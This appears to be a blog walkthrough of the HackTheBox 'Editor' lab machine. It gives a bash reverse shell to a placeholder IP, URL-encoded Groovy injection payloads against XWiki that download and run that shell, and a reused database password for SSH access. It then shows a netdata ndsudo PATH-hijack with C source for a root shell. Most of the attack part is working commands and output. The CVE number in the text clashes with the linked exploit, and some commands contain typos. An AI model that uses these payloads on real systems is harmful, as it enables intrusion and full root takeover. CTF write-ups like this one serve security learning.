HackTheBox Editor Walkthrough

insidepwninsidepwn
5 min read

This was an easy linux machine , nothing much

Initial Enumeration

  • So first I did nmap scan and found 3 ports to be open and a domain editor.htb which you can add in you /etc/hosts
sudo nano /etc/hosts
<MACHINE_IP>:editor.htb

  • When I go to the website , on first look it look like a code editor

  • Then when I got onto 8080 I saw it is using an open source wiki platform Xwiki

Foothold and user.txt

  • Also one more thing that is visible was it version that was 15.10.8

  • Then I google the version and found its vulnerable , its CVE was CVE 2025-24983

  • Then I googled the CVE 2025-24983 for shell but I didn’t found any scripts for that mostly scripts tell that the website is vulnerable to CVE 2025-24983

  • Then I stumbled across this github link https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py which further helped me to exploit and get shell

  • To exploit it we need to first create a shell.sh script then upload it to website then run it . Below are the commands for it

└─$ cat shell.sh     
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1
  • After creating a shell.sh start a python server in you local machine
└─$ python -m http.server 80
  • Then I in the browser paste these and enter make sure to change <YOUR_IP>
 http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln("wget%20-qO%20/tmp/shell.sh%20http://<YOUR_IP>/shell.sh".execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
  • In this the you have upload the shell now to run run it and get shell do this
nc -lnvp 4444 #in you local machine
http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22bash%20/tmp/shell.sh%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
💡
Run both the browser link in different tab , also if you dont get shell try reuploading the shell.sh to website
  • In this we get the shell as xwiki
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.xx.xx.xx] 57484
bash: cannot set terminal process group (1129): Inappropriate ioctl for device
bash: no job control in this shell
xwiki@editor:/usr/lib/xwiki-jetty$ whoami
whoami
xwiki
xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
  • Here in /etc/passwd output we can see the user in /home directory is oliver

  • On your enumeration when you look this file /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml

xwiki@editor:/usr/lib/xwiki$ cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
<lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
  • Here in this file you will find ssh password of user oliver which is theEd1t0rTeam99
ssh oliver@editor.htb
  • Then enter the password and you will get shell and oliver which has user.txt

Privilege Escalation and root.txt

  • First I ran sudo -l but it gets me nothing
oliver@editor:~$ sudo -l
[sudo] password for oliver: 
Sorry, user oliver may not run sudo on editor.
  • Then I ran ss -tulnp to show network sockets
oliver@editor:~$ ss -tulnp
Netid     State      Recv-Q     Send-Q              Local Address:Port          Peer Address:Port    Process    
udp       UNCONN     0          0                       127.0.0.1:8125               0.0.0.0:*                  
udp       UNCONN     0          0                   127.0.0.53%lo:53                 0.0.0.0:*                  
udp       UNCONN     0          0                         0.0.0.0:68                 0.0.0.0:*                  
tcp       LISTEN     0          4096                    127.0.0.1:44303              0.0.0.0:*                  
tcp       LISTEN     0          128                       0.0.0.0:22                 0.0.0.0:*                  
tcp       LISTEN     0          511                       0.0.0.0:80                 0.0.0.0:*                  
tcp       LISTEN     0          151                     127.0.0.1:3306               0.0.0.0:*                  
tcp       LISTEN     0          4096                    127.0.0.1:8125               0.0.0.0:*                  
tcp       LISTEN     0          4096                    127.0.0.1:19999              0.0.0.0:*                  
tcp       LISTEN     0          4096                127.0.0.53%lo:53                 0.0.0.0:*                  
tcp       LISTEN     0          70                      127.0.0.1:33060              0.0.0.0:*                  
tcp       LISTEN     0          128                          [::]:22                    [::]:*                  
tcp       LISTEN     0          511                          [::]:80                    [::]:*                  
tcp       LISTEN     0          50             [::ffff:127.0.0.1]:8079                     *:*                  
tcp       LISTEN     0          50                              *:8080                     *:*
  • At port 19999 we see a service running netdata

  • So I did port forwarding to see what I can do with this service

  • To port forward use the command below and open http://localhost:19999 in your browser

ssh -L 19999:127.0.0.1:19999 oliver@editor.htb

  • When you click on the red banner which tell us to update version it shows us this

  • This shows us that the current version of netdata service is 1.45.2 and we need to update it

  • Then I googled to find if version is vulnerable or not and indeed it is , and the CVE was CVE-2024-32019

💡
To read more about the CVE-2024-32019 visit this link https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
  • PoC :-
  1. Place an executable with a name that is on ndsudo’s list of commands (e.g. nvme) in a writable path

  2. Set the PATH environment variable so that it contains this path

  3. Run ndsudo with a command that will run the aforementioned executable

  • So first we create a malicious.c and compile it
└─$ cat malicious.c  
// malicious.c
#include <unistd.h>
#include <stdlib.h>
int main() {
  setuid(0);
  setgid(0);
  execl("/bin/bash", "bash", "-i", NULL);
  return 0;
}
└─$ gcc -o nvme malicious.c
  • Then we upload this in directory /tmp , to upload it we need to start a python server first in local machine where we have our executable nvme
└─$ python -m http.server 80
  • Then execute the following commands in oliver shell
cd /tmp
wget wget http://>YOUR_IP>/nvme
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp# whoami
root
root@editor:/tmp# cd /root/

This is it for the machine . Hope you enjoyed solving it .

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!

1
Subscribe to my newsletter

Read articles from insidepwn directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

insidepwn
insidepwn